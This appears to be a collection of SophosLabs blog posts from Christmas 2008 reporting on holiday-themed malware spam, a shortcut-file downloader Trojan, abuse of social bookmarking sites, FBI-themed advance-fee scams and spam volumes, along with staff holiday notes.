SophosLabs blog

The predictability of the social engineering used by malware authors is one of the few things that we can be certain about at Christmas (see Samir’s post here). True to form, over the past days and weeks a variety of malware spammed using Christmas or New Year themed social engineering have been floating around. This post serves as a warning to those who are not already aware of the risks of blindly running attachments or clicking links in such email.

Aside from the usual postcard and e-card malware, this year we have a Flash driven Happy Christmas greetings cartoon known as ‘Christmas Monkeys’. The malware authors have taken innocent Flash content (available online), and combined it with a backdoor Trojan in a dropper using the filename Christmas Monkeys.exe. The dropper then appears to have been spammed out to victims.

When run however, you get more than a couple of harmless cartoon monkeys for your trouble. The backdoor Trojan is extracted to the temp folder (as b.exe) and silently executed. The harmless Flash cartoon runs via a Macromedia Flash Player binary, extracted as a.exe to the same folder.

Of course, the victim is so wrapped in the monkeys, they are unlikely to notice any suspicious activity on the machine.

That is, unless they have Sophos installed, in which case, they would have been alerted to the writing of the backdoor Trojan (b.exe) to the temp folder.

Thanks to the proactive detection of the backdoor component (Mal/Rootkit-A), the malware will never get installed. Detection for the top level dropper has also been added (as Troj/Agent-IMV).

Users should not just be suspicious of email attachments. Another family we have seen active over the past few days is W32/Waled, a worm that sends emails containing a link to a spoof greeting card site.

Clicking on the link takes the victim to the malicious drop site (a variety of domains are being used).

Clicking on the image will result in getting prompted to download and run a copy of the worm (as postcard.exe). This is detected as W32/Waled-D. Additionally, a malicious script on the page attempts to load malicious content from another remote site in order to exploit a whole variety of browser vulnerabilities. Effective insurance against common sense switching back on, and not clicking on the image.

In summary, the same old predictable tricks. After a couple of days there should be a respite, before it all begins again in a few weeks in time for Valentine’s day.

Over Christmas I spent some time in the metropolis that is Heathrow’s Terminal 1. To pass the time I bought a couple of non-computing magazines (holidays are a chance to forget about work!). Imagine my surprise then when upon opening Scientific American, I found an article on Phishing.

The article titled, in the print copy, Can Phishing Be Foiled? was an insight into the work being done by Carnegie Mellon University’s research group, the Usable Privacy and Security Laboratory. The thing that caught my eye about the research was a project named Anti-Phishing Phil, which is a game that attempts to show people how to spot a Phish.

Luckily, that was the only computing related article :) Though I was struck by the similarity between research on Phishing (how computer scientists are looking at ways phishers fool people) and the article ‘Magic and the Brain‘ (how neuroscientists are looking at the ways that magicians fool people).

Strangely, in the other magazine I bought, there was also an article on Magic. A coincidence?

Whilst reading the paper yesterday morning an interesting article caught my eye. It suggested that the UK Government are considering to impose some form of ratings system on web sites in order to thwart offensive and malicious activity. From the interview published in the Daily Telegraph (online here), it is clear that the Culture Secretary, Andy Burnham, is concerned about the dangers children may face when browsing the web.

The thoughts expressed in the interview have angered many. The bulk of the comments that have been posted in response to the article are of a negative nature, seeing the move as an attack against free speech. This is to be expected - any attempt by Governments to monitor content or enforce regulations will immediately cause censorship arguments to flare up. But if we try to step aside from these issues for a moment, and think specifically about the current state of affairs with cybercrime, I do think there is some underlying value in trying to address some of the obvious problems that exist today. In this blog post I will consider just one of these problems - the abuse of online services we all use and trust.

The bulk of internet users are largely ignorant. Ignorant of the technology they are using, and ignorant of the threats that are out there. This is not meant as criticism - one of the great things about technology is that it empowers people to do things very easily. But this ignorance makes it easy for the bad guys to scam people, from stealing their credentials in phishing attacks to infecting their machine with malware.

Of course, the article is more concerned with preventing access to inappropriate content, not protecting users from malware. But the mention of defining “take down times” is something that is relevant to both. The sites that are so popular with users are the same sites that are being exploited by malware authors and scammers.

Back in January, I blogged about the abuse of social bookmarking sevices such as Digg [2]. Well, the practise has continued apace throughout the year. For example, poking through some of the links submitted (’Digged’) this morning, a batch of ones intended to infect victims with fake alert malware is quickly apparent. The lure in each is simple, just as with the social engineering in email-borne malware, as shown in the example below:

Anyone clicking on the link will go to a blog page providing a link to the movie content. After another redirection they end up at one of the familiar porntube sites we have talked about before (see for example here).

This simple example is a perfect example of one of the problems we have currently - the ease with which trusted services can be exploited. In the example, Digg and Blogspot have been abused, but they are not to be singled out. In reality a whole host of other similar sevices are being exploited in the same way.

The issue of take down (where upon notification, such services remove content rapidly) has become very important. But this is still reactive - users will still have been exposed to the threat. Should we not investigate methods of preventing the malicious content being uploaded in the first place? In many cases, the individuals posting the content are “new” to that service - of unknown reputation if you like. Our friend yetfaer who made the Digg posting above would certainly trigger even the most basic heuristics:

Similarly, the profiles of the posters of scores of pornographic content uploaded to popular video-sharing sites are suggestive of poor reputation. It should be trivial to reject (or classify appropriately) certain postings immedaitely, and not expose users to malicious or inappropriate content (reliant on user complaints/reports before the appropriate classification is made).

Rather than blanket enforcement of age-catgories, I would like to see more pressure on the providers of popular online services (video, blog, image and file sharing sites etc) to come up with more innovative ways of proactively blocking malicious or inappropriate content.

Drivng to family for Christmas, some of you may have tried taking a shortcut to avoid traffic queues. Sometimes those “shortcuts” can end up longer than the original route, but hopefully they did not get you into as much trouble as some of the shortcuts we have been seeing in spam recently.

I am talking about Windows “.lnk” shortcut files. Question: Can a shortcut cause a legitimate application on your computer to do malicious things?

Answer: Yes, easily. Take a look at the following, which arrived via one of our spam traps this morning:

“Target” shows just the start of a command with a long sequence of parameters - effectively a script. You can see enough to get the idea: using the command shell it will echo a series of commands to be executed, the first one of which opens a connection to a remote website. You can probably guess what the next command is: “get” - to download a file, which will then be executed. In short, this .lnk file is a downloader Trojan.

Over the past few weeks we have seen an increasing number of such shortcut links sent out in spam. This morning’s was detected as Troj/DownLnk-A. Previous examples include Troj/Dloadr-BVT. Since today was a fairly quiet day I have had time to prepare some generic detection for this technique. Over the next few days we will be scanning the web looking for where the technique is used, whether it has any legitimate uses, and if so how to differentiate legitimate samples from malware.

Meanwhile, stay safe online. Do not click on links from sources you do not trust or that seem out of context. Do not assume any kind of file attachment is safe - the bad guys are always making use of new tricks and exploits.

I also hope those of you still travelling have safe journeys over this festive season.

Robert

Reviewing Chee and Samir’s posts for Dec 26 2007 reminded me how much the Dorf family of malware dominated thinking in 2007. I don’t know the actual figure but I suspect a significant number of blog posts and identities written in 2007 were related to the Dorf campaign.

If I were to review the posts for 2008, particularly the last few months, then they would be completely dominated by SQL Injection attacks. Despite the patches being available we continue to see websites compromised through their backend databases. This continues to be a particularly worrying trend as many shopping sites rely on this technology to provide us with the goods we want and according to the news today on the BBC, we are even buying online now on Christmas Day. That could make a particularly unwelcome Christmas Present for someone over the holiday season.

As for today, the malware queue has seen a typical Fake AV Trojan plus some Agent Trojans. In the meantime the spam queues have seen the usual dominance of pills along with several gambling campaigns. It’s been another normal day here at SophosLabs

On this relatively quiet Christmas day, I got a chance to examine some of the messages that came to our spamtraps. I was searching for Christmas/new year related Nigerian scams, and I came across something else quite strange, which is Federal Bureau of Investigation (FBI)-themed Nigerian scams.

The FBI would never give out atm cards full of cash, or if they do, they would probably not give out the money from a Nigerian bank. I wonder if the scammers had thought this all through before sending out these scams. I managed to find three different messages that we have received in the past few days.

First up is a nicely put together message that even has a FBI banner at the top and a NSB seal at the bottom:

I am quite sure that the “Intelligence Monitoring System”, if it exists, does not help verify if people won a sum of money. Of all the FBI-themed scams I’m showing today, the scammers in this one is by far the greediest. They are asking for an advance-fee for $850 - quite a hefty sum. Of course, if a person has parted with his/her money to these scammers, they’ll never see it again. Definitely not “Safe and 100% risk free”.

Second message is a promise for an “ATM card with lots of money”:

This second message also mentions the “Intelligence Monitoring System” but the message body is different. It seems that the scammers could not make up their mind on the content of the message and ended up contradicting themselves. In the first paragraph, the message first claims that the recipient is getting defrauded by imposters. Later on in the paragraph, it says that the payment has not been received because “you have not fulfilled your Financial oblication give to you in respect of your Contract/Inheritance Payment”. So which scenario is it? A fraudster or a missing fee? Even though the “total payment” of the scam is also $800,000 US dollars, the amount of advanced fee asked for in this message is only $150. Perhaps a nicer looking scam message has a bigger price tag?

The third FBI-themed Nigerian scam is just as convoluted as the other two:

In this third scam, the payment value has been raised to $10,700,000, more than ten times increase in value compared to the other two messages. This time they did not list the value of the advance fee. Once again, the scammers claim that the payment is “100% genuine and hitch free”. The strangest part of this scam message is the title of the supposed report which is “FEDERAL BUREAU OF INVESTIGATION SEEKING TO WIRETAP THE INTERNET”. I have no idea what that has to do with the rest of the message.

After reading through the three messages, it strikes me that the messages may all originate from the same source. Whether the messages themselves seem convincing or not, I hope no one fell for these scam especially during the holidays. Hopefully, with more awareness of these scams, they would disappear and become a thing of the past. At least one could wish for that in the new year.

Today, I am in work with Mathieu and we are processing any spam that the automated systems don’t already block and analysing any malware that we don’t already proactively detect - actually Mathieu is doing the hard work whilst I do the easy work. I am pleased to be able to report that it is relatively quiet.

Whilst it is quiet I have had a look at my personal catch rate. I have blogged about this before here and I thought I should check out how it has fared since McColo was taken down. Several of the SophosLabs guys reported on this back in November - here, here and here.

Here is the graph of my catch rate since 1 Oct 2008.

From my previous post you can see that spam goes in cycles over time and it was already starting to decline from an average of 170 messages a day but once McColo was shut down it averaged 70 per day. Since then, despite the Rustock botnet being revived, my personal catch rate has not changed significantly.

One last point, I was wondering whether spam declined or increased close to Christmas. I’ll leave you to interpret the graph as you see fit but I reckon there was an increase in early December but it has probably now fallen back to it’s late November level. In the meantime there is still plenty of spam and malware being written and Sean reported earlier today on what he was seeing. From my perspective, watching the spam systems, I am left wondering just how much viagra one person can handle…

Have a great, and safe, Christmas.

Forget the financial crisis folks, there are still plenty of too-good-to-be-true deals available for those looking for a last minute Christmas day bargain gift. Check out the following great email deals:

For those that need help in the sack, and willing to take medications they have no idea how and/or where it was made, try this guy

For those looking to have their bank account details stolen, click on the link

For those looking to have their ID stolen, get your ID card ready

Folks, not everyone around the world is at home enjoying a day off with family and friends so there is no reason why spammers would pass on the opportunity to make a quick buck, and they don’t.

For all those working today where they might have otherwise been enjoying festivities, or working just to get out of going to Aunt Mavis’s boring Christmas lunch, have a merry day!

This isn’t my typical malware related blog post definitely. Canada is experiencing some of the worst winter weather in a long time. The reason I elected to settle in Vancouver in the first place was primarily because it snowed 3 to 4 days a year and remained at temperatures ranging from 5C to -5C (41F to 23F) throughout the winter months while the rest of Canada suffers temperatures well below -20C (-4F).

Though it’s not very cold in Vancouver right now, we’re getting more snow than normal. We’ve had 30cm fall in the last three days with another 15-20cm of snow expected today and tomorrow. The reason this is extraordinary is because this is the first white Christmas Vancouver is going to have since ‘98 which is exciting. I thought I’d share a few picture snapped with my phone:

Sophos building from across the street

Snow on our rooftop

Snow on the pavement beside the office

I’m glad to report everyone working today managed to get to the office safe and sound with loads of joyous snow stories to share :)

Have a merry Christmas everyone!